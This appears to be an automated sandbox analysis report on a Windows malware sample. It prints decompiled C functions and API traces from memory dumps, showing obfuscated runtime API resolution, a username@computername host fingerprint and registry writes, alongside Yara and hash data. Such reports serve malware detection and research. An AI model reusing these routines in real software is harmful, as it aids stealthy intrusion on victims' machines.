Part of subcall function 001D903C: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,001D5D90,63699BCE,001D4CBB,73797325), ref: 001D904D
Part of subcall function 001D903C: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 001D9067

GetModuleHandleA.KERNEL32(4E52454B,02FA8CEF,73797325), ref: 001D4F8C
GetProcAddress.KERNEL32(00000000), ref: 001D4F93
HeapFree.KERNEL32(00000000,00000000), ref: 001D4FFB

Part of subcall function 001D9186: GetProcAddress.KERNEL32(36776F57,001D67DC), ref: 001D91A1

CloseHandle.KERNEL32(00000000,00000001), ref: 001D4FD8
CloseHandle.KERNEL32(?), ref: 001D4FDD
GetLastError.KERNEL32(00000001), ref: 001D4FE1

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 3075724336-0
Opcode ID: 7e49fc6ee228094c1b880fc9d8b271488e699f2fc47bc48ba919a5e3c97d8b52
Instruction ID: 652c85721afce153c3c20b483f314c8634b6897d835941b24f78504275056467
Opcode Fuzzy Hash: 7e49fc6ee228094c1b880fc9d8b271488e699f2fc47bc48ba919a5e3c97d8b52
Instruction Fuzzy Hash: 86315AB6801209BFDB10AFA8DC88D9EBBBCEF08344F104566F605A7221C730AD45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 001D8840, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E001D8840(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x1dd2a4; // 0x2dca5a8
				_t1 = _t9 + 0x1de62c; // 0x253d7325
				_t36 = 0;
				_t28 = E001D2BC9(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E001D7E20(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E001D5FCE(_t34, _t41, _a8);
						E001DA5FA(_t41);
						_t42 = E001D7D98(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E001DA5FA(_t36);
							_t36 = _t42;
						}
						_t43 = E001D7EBE(_t36, _t33);
						if(_t43 != 0) {
							E001DA5FA(_t36);
							_t36 = _t43;
						}
					}
					E001DA5FA(_t28);
				}
				return _t36;
			}

0x001d8840
0x001d8843
0x001d8844
0x001d884c
0x001d8853
0x001d885a
0x001d885e
0x001d8864
0x001d886b
0x001d8870
0x001d8882
0x001d8886
0x001d888a
0x001d8890
0x001d8895
0x001d88a5
0x001d88a7
0x001d88be
0x001d88c2
0x001d88c5
0x001d88ca
0x001d88ca
0x001d88d3
0x001d88d7
0x001d88da
0x001d88df
0x001d88df
0x001d88d7
0x001d88e2
0x001d88e2
0x001d88ed

APIs

Part of subcall function 001D2BC9: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,001D885A,253D7325,00000000,00000000,7742C740,?,?,001D2AF0,?), ref: 001D2C30
Part of subcall function 001D2BC9: sprintf.NTDLL ref: 001D2C51

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,001D2AF0,?,02FA95B0), ref: 001D886B
lstrlen.KERNEL32(?,?,?,001D2AF0,?,02FA95B0), ref: 001D8873

Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C

strcpy.NTDLL ref: 001D888A
lstrcat.KERNEL32(00000000,?), ref: 001D8895

Part of subcall function 001D5FCE: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,001D88A4,00000000,?,?,?,001D2AF0,?,02FA95B0), ref: 001D5FE5

Part of subcall function 001DA5FA: HeapFree.KERNEL32(00000000,00000000,001D81B4,00000000,?,?,00000000), ref: 001DA606

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,001D2AF0,?,02FA95B0), ref: 001D88B2

Part of subcall function 001D7D98: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,001D88BE,00000000,?,?,001D2AF0,?,02FA95B0), ref: 001D7DA2
Part of subcall function 001D7D98: _snprintf.NTDLL ref: 001D7E00

Strings

=, xrefs: 001D88AC

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 83769cba7a5f1cdfdc05364cf5988c44526da56ce5f6c51d8c5742cb613f0052
Instruction ID: b479f13058643177f91b3dbf0b290b47c8c9155efc0be343d39f9eb06f6b7d03
Opcode Fuzzy Hash: 83769cba7a5f1cdfdc05364cf5988c44526da56ce5f6c51d8c5742cb613f0052
Instruction Fuzzy Hash: 6A11C2379026257B8612BBB8AC85C7F3BAE9F957613050427F6019B341DF35CD02A7E2

Uniqueness

Uniqueness Score: -1.00%

Function 001D1598, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 001D15F2
SysAllocString.OLEAUT32(0070006F), ref: 001D1606
SysAllocString.OLEAUT32(00000000), ref: 001D1618
SysFreeString.OLEAUT32(00000000), ref: 001D1680
SysFreeString.OLEAUT32(00000000), ref: 001D168F
SysFreeString.OLEAUT32(00000000), ref: 001D169A

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: f13ae21b013a381290a2a1d75c7f03462c65b5520ca1a10422671f11e01aec35
Instruction ID: eafdcb8621c12669d28606b428cbee392fbcce46ff20bc252ded434e08b00682
Opcode Fuzzy Hash: f13ae21b013a381290a2a1d75c7f03462c65b5520ca1a10422671f11e01aec35
Instruction Fuzzy Hash: 1D413C36D0060ABBDB01DFF8D844AAEB7BAAF49301F144466E914EB260DBB1DD45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001D4896, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001D4896(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E001D7E20(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x1dd2a4; // 0x2dca5a8
					_t1 = _t23 + 0x1de11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x1dd2a4; // 0x2dca5a8
					_t2 = _t26 + 0x1de769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E001DA5FA(_t54);
					} else {
						_t30 =  *0x1dd2a4; // 0x2dca5a8
						_t5 = _t30 + 0x1de756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x1dd2a4; // 0x2dca5a8
							_t7 = _t33 + 0x1de40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x1dd2a4; // 0x2dca5a8
								_t9 = _t36 + 0x1de4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x1dd2a4; // 0x2dca5a8
									_t11 = _t39 + 0x1de779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E001D6582(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x001d48a5
0x001d48a9
0x001d496b
0x001d48af
0x001d48af
0x001d48b4
0x001d48c7
0x001d48c9
0x001d48ce
0x001d48d6
0x001d48dd
0x001d48df
0x001d48e4
0x001d4963
0x001d4964
0x001d48e6
0x001d48e6
0x001d48eb
0x001d48f3
0x001d48f5
0x001d48fa
0x00000000
0x001d48fc
0x001d48fc
0x001d4901
0x001d4909
0x001d490b
0x001d4910
0x00000000
0x001d4912
0x001d4912
0x001d4917
0x001d491f
0x001d4921
0x001d4926
0x00000000
0x001d4928
0x001d4928
0x001d492d
0x001d4935
0x001d4937
0x001d493c
0x00000000
0x001d493e
0x001d4944
0x001d4949
0x001d4950
0x001d4955
0x001d495a
0x00000000
0x001d495c
0x001d495f
0x001d495f
0x001d495a
0x001d493c
0x001d4926
0x001d4910
0x001d48fa
0x001d48e4
0x001d4979

APIs

Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,001D4F08,?,00000001,?,?,00000000,00000000), ref: 001D48BB
GetProcAddress.KERNEL32(00000000,7243775A), ref: 001D48DD
GetProcAddress.KERNEL32(00000000,614D775A), ref: 001D48F3
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 001D4909
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 001D491F
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 001D4935

Part of subcall function 001D6582: memset.NTDLL ref: 001D6601

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 3dd6389c6cc43900902a424be59df8675151c9cd7c8be4125b7ce50b321ddd41
Instruction ID: 5b86bc9f3f8b3b76f868632c577c74ce5f1f4527ee0cd7dff895b830012868e8
Opcode Fuzzy Hash: 3dd6389c6cc43900902a424be59df8675151c9cd7c8be4125b7ce50b321ddd41
Instruction Fuzzy Hash: F6215CB160260AAFD720EF6ADC84E6BB7ECEF48704B114467E549DB351E770E905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E284BCB, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6E284BF3

Part of subcall function 6E281407: __getptd.LIBCMT ref: 6E281415
Part of subcall function 6E281407: __getptd.LIBCMT ref: 6E281423

__getptd.LIBCMT ref: 6E284BFD

Part of subcall function 6E283307: __getptd_noexit.LIBCMT ref: 6E28330A
Part of subcall function 6E283307: __amsg_exit.LIBCMT ref: 6E283317

__getptd.LIBCMT ref: 6E284C0B
__getptd.LIBCMT ref: 6E284C19
__getptd.LIBCMT ref: 6E284C24
_CallCatchBlock2.LIBCMT ref: 6E284C4A

Part of subcall function 6E2814AC: __CallSettingFrame@12.LIBCMT ref: 6E2814F8

Part of subcall function 6E284CF1: __getptd.LIBCMT ref: 6E284D00
Part of subcall function 6E284CF1: __getptd.LIBCMT ref: 6E284D0E

Memory Dump Source

Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 2b5c4b26aa238ef2731b7681a9c10d53cc21645a98bdbbf697043bcf6117ff31
Instruction ID: 0eeec9ef972102bf9326ffb8020914b492c23d94844a8e1d1290eaa553f34b8c
Opcode Fuzzy Hash: 2b5c4b26aa238ef2731b7681a9c10d53cc21645a98bdbbf697043bcf6117ff31
Instruction Fuzzy Hash: 6E11D7B5C0024DDFDB00DFE4C448AEEBBBAFF14318F108969E854A7290DB389A599F54

Uniqueness

Uniqueness Score: -1.00%

Function 001D3F60, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E001D3F60(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t85;
				void* _t95;
				void* _t96;
				char _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t96 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0x1dd33c);
					_t95 = 0x80000002;
					L6:
					_t60 = E001D1546(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E001D922B(_t96, _t101, _t105, _t95, _t60) != 0) {
						L27:
						E001DA5FA(_a8);
						goto L29;
					}
					_t65 =  *0x1dd2a4; // 0x2dca5a8
					_t16 = _t65 + 0x1de8fe; // 0x65696c43
					_t68 = E001D1546(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t69 =  *_t29;
						_t33 = _t105 + 0x10; // 0x3d001dc0
						if(E001D4413(_t101,  *_t33, _t95, _a8,  *0x1dd334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)(_t69 + 0x2c))) == 0) {
							_t71 =  *0x1dd2a4; // 0x2dca5a8
							if(_t102 == 0) {
								_t35 = _t71 + 0x1dea5f; // 0x4d4c4b48
								_t72 = _t35;
							} else {
								_t34 = _t71 + 0x1de89f; // 0x55434b48
								_t72 = _t34;
							}
							if(E001D4744(_t72,  *0x1dd334,  *0x1dd338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t74 =  *0x1dd2a4; // 0x2dca5a8
									_t44 = _t74 + 0x1de871; // 0x74666f53
									_t103 = E001D1546(0, _t44);
									if(_t77 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d001dc0
										E001D27A2( *_t47, _t95, _a8,  *0x1dd338, _a24);
										_t49 = _t105 + 0x10; // 0x3d001dc0
										E001D27A2( *_t49, _t95, _t103,  *0x1dd330, _a16);
										E001DA5FA(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d001dc0
									E001D27A2( *_t40, _t95, _a8,  *0x1dd338, _a24);
									_t43 = _t105 + 0x10; // 0x3d001dc0
									E001D27A2( *_t43, _t95, _a8,  *0x1dd330, _a16);
								}
								if( *_t105 != 0) {
									E001DA5FA(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d001dc0
					_t85 = E001D5AF6( *_t21, _t95, _a8, _t68,  &_v16,  &_v12);
					if(_t85 == 0) {
						_t104 = _v16;
						if(_v12 == 0x28) {
							 *_t104 =  *_t104 & _t85;
							_t26 = _t105 + 0x10; // 0x3d001dc0
							E001D4413(_t101,  *_t26, _t95, _a8, _a24, _t104, 0x28);
						}
						E001DA5FA(_t104);
						_t102 = _a16;
					}
					E001DA5FA(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t101 = _a8;
					E001DA88E(_t102, _a8,  &_v284);
					__imp__(_t106 + _t102 - 0x117,  *0x1dd33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t95 = 0x80000003;
					goto L6;
				}
			}

0x001d3f60
0x001d3f69
0x001d3f70
0x001d3f75
0x001d3fe2
0x001d3fe8
0x001d3fed
0x001d3ff6
0x001d3ffb
0x001d4000
0x001d4173
0x001d417a
0x001d417a
0x001d417f
0x001d4181
0x001d4181
0x001d418a
0x001d418a
0x001d4006
0x001d4012
0x001d4169
0x001d416c
0x00000000
0x001d416c
0x001d4018
0x001d401d
0x001d4026
0x001d402b
0x001d4030
0x001d4079
0x001d4079
0x001d4079
0x001d408c
0x001d4096
0x001d409c
0x001d40a3
0x001d40ad
0x001d40ad
0x001d40a5
0x001d40a5
0x001d40a5
0x001d40a5
0x001d40cf
0x001d40d7
0x001d4105
0x001d410a
0x001d4118
0x001d411c
0x001d414e
0x001d411e
0x001d412b
0x001d412e
0x001d413e
0x001d4141
0x001d4147
0x001d4147
0x001d40d9
0x001d40e6
0x001d40e9
0x001d40fb
0x001d40fe
0x001d40fe
0x001d4158
0x001d4164
0x001d415a
0x001d415d
0x001d415d
0x001d4158
0x001d40cf
0x00000000
0x001d4096
0x001d403f
0x001d4042
0x001d4049
0x001d404f
0x001d4052
0x001d4054
0x001d4060
0x001d4063
0x001d4063
0x001d4069
0x001d406e
0x001d406e
0x001d4074
0x00000000
0x001d4074
0x001d3f7a
0x00000000
0x001d3fa1
0x001d3fa1
0x001d3fad
0x001d3fc0
0x001d3fc6
0x001d3fce
0x00000000
0x001d3fce

APIs

StrChrA.SHLWAPI(001D86C4,0000005F,00000000,00000000,00000104), ref: 001D3F93
lstrcpy.KERNEL32(?,?), ref: 001D3FC0

Part of subcall function 001D1546: lstrlen.KERNEL32(?,00000000,001DD330,00000001,001D67F7,001DD00C,001DD00C,00000000,00000005,00000000,00000000,?,?,?,001D41AA,001D5D90), ref: 001D154F
Part of subcall function 001D1546: mbstowcs.NTDLL ref: 001D1576
Part of subcall function 001D1546: memset.NTDLL ref: 001D1588

Part of subcall function 001D27A2: lstrlenW.KERNEL32(?,?,?,001D4133,3D001DC0,80000002,001D86C4,001D2F48,74666F53,4D4C4B48,001D2F48,?,3D001DC0,80000002,001D86C4,?), ref: 001D27C7

Part of subcall function 001DA5FA: HeapFree.KERNEL32(00000000,00000000,001D81B4,00000000,?,?,00000000), ref: 001DA606

lstrcpy.KERNEL32(?,00000000), ref: 001D3FE2

Strings

\, xrefs: 001D3FC6
(, xrefs: 001D404B

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 2952964e4cc602648ce40cc4ebfec983e2dc5affae20eedbfbc705a6a983c357
Instruction ID: d407fdc591c45f26b7985c389b30cc94f8f4a38c7a6533de38af5188d4ace7e9
Opcode Fuzzy Hash: 2952964e4cc602648ce40cc4ebfec983e2dc5affae20eedbfbc705a6a983c357
Instruction Fuzzy Hash: DC515C7210120AFFDF21EFA0ED40EAA37B9FF64300F108516FA1596261DB35E995EB12

Uniqueness

Uniqueness Score: -1.00%

Function 001D1363, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001D1363() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E001D7E20(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E001DA5FA(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x1d2a02
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x001d1371
0x001d1374
0x001d1377
0x001d137d
0x001d1382
0x001d1388
0x001d1390
0x001d1393
0x001d1399
0x001d139e
0x001d13ab
0x001d13b8
0x001d13bc
0x001d13be
0x001d13c2
0x001d13c5
0x001d13d5
0x001d1428
0x001d1429
0x001d13d7
0x001d13dc
0x001d13dd
0x001d13e2
0x001d13e5
0x001d13f8
0x00000000
0x001d13fa
0x001d13fd
0x001d1402
0x001d1410
0x001d1413
0x001d1419
0x001d141e
0x00000000
0x001d1420
0x001d1420
0x001d1423
0x001d1423
0x001d141e
0x001d13f8
0x001d142e
0x001d142f
0x001d139e
0x001d1435

APIs

GetUserNameW.ADVAPI32(00000000,001D2A00), ref: 001D1377
GetComputerNameW.KERNEL32(00000000,001D2A00), ref: 001D1393

Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C

GetUserNameW.ADVAPI32(00000000,001D2A00), ref: 001D13CD
GetComputerNameW.KERNEL32(001D2A00,?), ref: 001D13F0
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,001D2A00,00000000,001D2A02,00000000,00000000,?,?,001D2A00), ref: 001D1413

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: a1f3dc1b52f5ae0ca26362936cd91fef5cbeecd77363b5198219cf62b0c84854
Instruction ID: bfdaa1f9e274164a8a0a6da712baa5ab3617310c108c9f8de2a99faba1c3047c
Opcode Fuzzy Hash: a1f3dc1b52f5ae0ca26362936cd91fef5cbeecd77363b5198219cf62b0c84854
Instruction Fuzzy Hash: 8821D776A01209FFCB11DFE8D9859EEBBBDEF44304B5044AAE501E7240D7309B45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E283880, Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6E28388C

Part of subcall function 6E283307: __getptd_noexit.LIBCMT ref: 6E28330A
Part of subcall function 6E283307: __amsg_exit.LIBCMT ref: 6E283317

__amsg_exit.LIBCMT ref: 6E2838AC
__lock.LIBCMT ref: 6E2838BC
InterlockedDecrement.KERNEL32(?), ref: 6E2838D9
InterlockedIncrement.KERNEL32(6E2B3DA8), ref: 6E283904

Memory Dump Source

Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 7233a2e988d8b053c84c03886333f9d2590991cbf694fddaebd58eccf5d2205b
Instruction ID: c099af2b697f64037b011b46a701f204f3e646c18dcbfd5dc47e02c4ec9f2e00
Opcode Fuzzy Hash: 7233a2e988d8b053c84c03886333f9d2590991cbf694fddaebd58eccf5d2205b
Instruction Fuzzy Hash: 82018435A01A2FABDB519BE5840DB8F7767BF01729F104405D824A76C0CB74698DCBE1

Uniqueness

Uniqueness Score: -1.00%

Function 001D5722, Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001D5722(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E001D8389(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E001DA961(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x1dd12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x001d5722
0x001d572f
0x001d5731
0x001d5794
0x00000000
0x001d5794
0x001d5749
0x001d5750
0x001d575c
0x001d5761
0x001d5763
0x001d5765
0x001d5767
0x001d5769
0x001d576b
0x001d5777
0x001d5787
0x00000000
0x001d5779
0x001d5779
0x001d5780
0x001d578d
0x001d578d
0x001d578d
0x001d5780
0x001d5777
0x001d5792
0x00000000
0x00000000
0x001d5798

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,001D6187,?,?,00000000,00000000), ref: 001D575C
ResetEvent.KERNEL32(?), ref: 001D5761
GetLastError.KERNEL32 ref: 001D5779
GetLastError.KERNEL32(?,?,00000102,001D6187,?,?,00000000,00000000), ref: 001D5794

Part of subcall function 001D8389: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,001D5741,?,?,?,?,00000102,001D6187,?,?,00000000), ref: 001D8395
Part of subcall function 001D8389: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,001D5741,?,?,?,?,00000102,001D6187,?), ref: 001D83F3
Part of subcall function 001D8389: lstrcpy.KERNEL32(00000000,00000000), ref: 001D8403

SetEvent.KERNEL32(?), ref: 001D5787

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: bb4177970554ff3fd9e7ba02e52e890094538bb416d04a907acb5d050126a37a
Instruction ID: cc146ecb6116d69b949b26a40dedf41627fadbabf0aa946ff93a190c7d196b17
Opcode Fuzzy Hash: bb4177970554ff3fd9e7ba02e52e890094538bb416d04a907acb5d050126a37a
Instruction Fuzzy Hash: 86018B31101A01EEDB306B20DC84F2BBBAABF54364F600B26F551912E0D720E800DA60

Uniqueness

Uniqueness Score: -1.00%

Function 6E280157, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

